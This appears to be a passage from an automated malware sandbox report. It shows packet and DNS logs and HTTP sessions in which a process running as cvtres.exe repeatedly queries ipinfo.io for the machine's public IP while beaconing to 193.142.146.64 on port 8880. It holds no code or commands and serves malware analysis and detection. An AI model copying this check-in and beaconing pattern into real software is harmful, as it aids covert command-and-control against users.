                                  Oct 5, 2024 16:47:37.805219889 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.805836916 CEST805046634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:37.805915117 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.806063890 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.810914040 CEST805046634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:38.294878960 CEST805046634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:38.295133114 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:38.300065994 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:38.300122976 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:38.305059910 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:38.340681076 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:39.419354916 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:39.419424057 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:39.419608116 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:39.424390078 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:40.434802055 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:40.442785025 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:40.442923069 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:40.443799973 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.445101023 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.450442076 CEST805046634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:40.450541019 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.451319933 CEST805046834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:40.451442957 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.452059031 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.458367109 CEST805046834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:40.928097010 CEST805046834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:40.930454969 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:40.935420036 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:40.935509920 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:40.940409899 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:40.996959925 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:42.060400963 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:42.060466051 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:42.060736895 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:42.065612078 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:43.075480938 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:43.080415964 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:43.080518007 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:43.081850052 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.083209038 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.087502003 CEST805046834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:43.087616920 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.088104010 CEST805047034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:43.088207960 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.088505030 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.093369007 CEST805047034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:43.570760965 CEST805047034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:43.570986986 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:43.575961113 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:43.576008081 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:43.580899000 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:43.625845909 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:44.702678919 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:44.702810049 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:44.702985048 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:44.707837105 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:45.716147900 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:45.721280098 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:45.721412897 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:45.722122908 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.722856045 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.727375984 CEST805047034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:45.727483034 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.727915049 CEST805047234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:45.727997065 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.728125095 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.732939005 CEST805047234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:46.202620983 CEST805047234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:46.203237057 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:46.208131075 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:46.208205938 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:46.215255976 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:46.247417927 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:47.429291964 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:47.429374933 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:47.429549932 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:47.434334040 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:48.435740948 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:48.442066908 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:48.442203999 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:48.442950964 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.443598032 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.448153973 CEST805047234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.448496103 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.449399948 CEST805047434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.449480057 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.449616909 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.454406023 CEST805047434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.926489115 CEST805047434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.926985979 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.927213907 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:48.933895111 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:48.933914900 CEST805047434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.934056044 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.934070110 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:48.941848040 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:50.061603069 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:50.061774969 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:50.063343048 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:50.069740057 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:51.076934099 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:51.081912041 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:51.082618952 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:51.085625887 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:51.090523005 CEST805047634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:51.090697050 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:51.091321945 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:51.096174955 CEST805047634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:51.576253891 CEST805047634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:51.576581955 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:51.581461906 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:51.581574917 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:51.586369991 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:51.622123957 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:52.702570915 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:52.702820063 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:52.724571943 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:52.729582071 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:53.731916904 CEST504778880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:53.736895084 CEST888050477193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:53.737039089 CEST504778880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:53.738468885 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:53.739907026 CEST5047880192.168.2.734.117.59.81
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 5, 2024 16:46:39.524691105 CEST | 54638 | 53 | 192.168.2.7 | 1.1.1.1
Oct 5, 2024 16:46:39.532150030 CEST | 53 | 54638 | 1.1.1.1 | 192.168.2.7
Oct 5, 2024 16:46:51.363500118 CEST | 53 | 62840 | 162.159.36.2 | 192.168.2.7
Oct 5, 2024 16:46:51.907586098 CEST | 53562 | 53 | 192.168.2.7 | 1.1.1.1
Oct 5, 2024 16:46:51.915015936 CEST | 53 | 53562 | 1.1.1.1 | 192.168.2.7
Oct 5, 2024 16:46:55.869183064 CEST | 52505 | 53 | 192.168.2.7 | 1.1.1.1
Oct 5, 2024 16:46:55.877756119 CEST | 53 | 52505 | 1.1.1.1 | 192.168.2.7
Oct 5, 2024 16:47:20.918680906 CEST | 55254 | 53 | 192.168.2.7 | 1.1.1.1
Oct 5, 2024 16:47:20.925561905 CEST | 53 | 55254 | 1.1.1.1 | 192.168.2.7
Oct 5, 2024 16:47:35.146512985 CEST | 59167 | 53 | 192.168.2.7 | 1.1.1.1
Oct 5, 2024 16:47:35.153973103 CEST | 53 | 59167 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 5, 2024 16:46:39.524691105 CEST | 192.168.2.7 | 1.1.1.1 | 0x50e8 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Oct 5, 2024 16:46:51.907586098 CEST | 192.168.2.7 | 1.1.1.1 | 0x2ad7 | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 5, 2024 16:46:55.869183064 CEST | 192.168.2.7 | 1.1.1.1 | 0xc3a2 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Oct 5, 2024 16:47:20.918680906 CEST | 192.168.2.7 | 1.1.1.1 | 0x7838 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Oct 5, 2024 16:47:35.146512985 CEST | 192.168.2.7 | 1.1.1.1 | 0xbb83 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 5, 2024 16:46:39.532150030 CEST | 1.1.1.1 | 192.168.2.7 | 0x50e8 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Oct 5, 2024 16:46:51.915015936 CEST | 1.1.1.1 | 192.168.2.7 | 0x2ad7 | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 5, 2024 16:46:55.877756119 CEST | 1.1.1.1 | 192.168.2.7 | 0xc3a2 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Oct 5, 2024 16:47:20.925561905 CEST | 1.1.1.1 | 192.168.2.7 | 0x7838 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Oct 5, 2024 16:47:35.153973103 CEST | 1.1.1.1 | 192.168.2.7 | 0xbb83 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
                                  • ipinfo.io
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49804 | 34.117.59.81 | 80 | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | Bytes transferred | Direction | Data
Oct 5, 2024 16:46:39.548820972 CEST | 61 | OUT
    GET /ip HTTP/1.1
    Host: ipinfo.io
    Connection: Keep-Alive
Oct 5, 2024 16:46:40.215892076 CEST | 240 | IN
    HTTP/1.1 200 OK
    date: Sat, 05 Oct 2024 14:46:39 GMT
    content-type: text/plain; charset=utf-8
    Content-Length: 11
    access-control-allow-origin: *
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33
Oct 5, 2024 16:46:40.239494085 CEST | 240 | IN
    HTTP/1.1 200 OK
    date: Sat, 05 Oct 2024 14:46:39 GMT
    content-type: text/plain; charset=utf-8
    Content-Length: 11
    access-control-allow-origin: *
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49816 | 34.117.59.81 | 80 | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | Bytes transferred | Direction | Data
Oct 5, 2024 16:46:41.964350939 CEST | 61 | OUT
    GET /ip HTTP/1.1
    Host: ipinfo.io
    Connection: Keep-Alive
Oct 5, 2024 16:46:42.475538969 CEST | 240 | IN
    HTTP/1.1 200 OK
    date: Sat, 05 Oct 2024 14:46:41 GMT
    content-type: text/plain; charset=utf-8
    Content-Length: 11
    access-control-allow-origin: *
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49833 | 34.117.59.81 | 80 | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | Bytes transferred | Direction | Data
Oct 5, 2024 16:46:44.681809902 CEST | 37 | OUT
    GET /ip HTTP/1.1
    Host: ipinfo.io
Oct 5, 2024 16:46:45.156877995 CEST | 240 | IN
    HTTP/1.1 200 OK
    date: Sat, 05 Oct 2024 14:46:44 GMT
    content-type: text/plain; charset=utf-8
    Content-Length: 11
    access-control-allow-origin: *
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49850 | 34.117.59.81 | 80 | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | Bytes transferred | Direction | Data
Oct 5, 2024 16:46:47.321887016 CEST | 61 | OUT
    GET /ip HTTP/1.1
    Host: ipinfo.io
    Connection: Keep-Alive
Oct 5, 2024 16:46:47.797816992 CEST | 240 | IN
    HTTP/1.1 200 OK
    date: Sat, 05 Oct 2024 14:46:47 GMT
    content-type: text/plain; charset=utf-8
    Content-Length: 11
    access-control-allow-origin: *
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49865 | 34.117.59.81 | 80 | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp | Bytes transferred | Direction | Data
Oct 5, 2024 16:46:50.075680971 CEST | 61 | OUT
    GET /ip HTTP/1.1
    Host: ipinfo.io
    Connection: Keep-Alive
Oct 5, 2024 16:46:50.579448938 CEST | 240 | IN
    HTTP/1.1 200 OK
    date: Sat, 05 Oct 2024 14:46:50 GMT
    content-type: text/plain; charset=utf-8
    Content-Length: 11
    access-control-allow-origin: *
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  5          | 192.168.2.7 | 50329       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:46:52.770040989 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:53.566658974 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:52 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:46:53.567800999 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:52 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  6          | 192.168.2.7 | 50348       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:46:55.901055098 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:56.379522085 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:55 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  7          | 192.168.2.7 | 50364       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:46:58.103980064 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:46:58.681879044 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:46:58 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  8          | 192.168.2.7 | 50381       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:00.992677927 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:01.493001938 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:01 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  9          | 192.168.2.7 | 50398       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:03.688852072 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:04.163184881 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:03 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  10         | 192.168.2.7 | 50415       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:06.322479010 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:06.805242062 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:06 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  11         | 192.168.2.7 | 50432       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:08.962059021 CEST | 37                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:47:09.473046064 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:09 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  12         | 192.168.2.7 | 50445       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:12.636420965 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:13.113657951 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:12 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  13         | 192.168.2.7 | 50450       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:15.276431084 CEST | 37                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:47:15.765188932 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:15 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  14         | 192.168.2.7 | 50452       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:17.946633101 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:18.431031942 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:18 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  15         | 192.168.2.7 | 50454       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:20.931583881 CEST | 37                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:47:21.425858974 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:21 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  16         | 192.168.2.7 | 50456       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:23.679546118 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:24.136053085 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:23 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  17         | 192.168.2.7 | 50458       | 34.117.59.81   | 80               | 7640 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Timestamp                           | Bytes transferred | Direction | Data
                                  Oct 5, 2024 16:47:26.319240093 CEST | 61                | OUT       | GET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:26.773137093 CEST | 240               | IN        | HTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:25 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
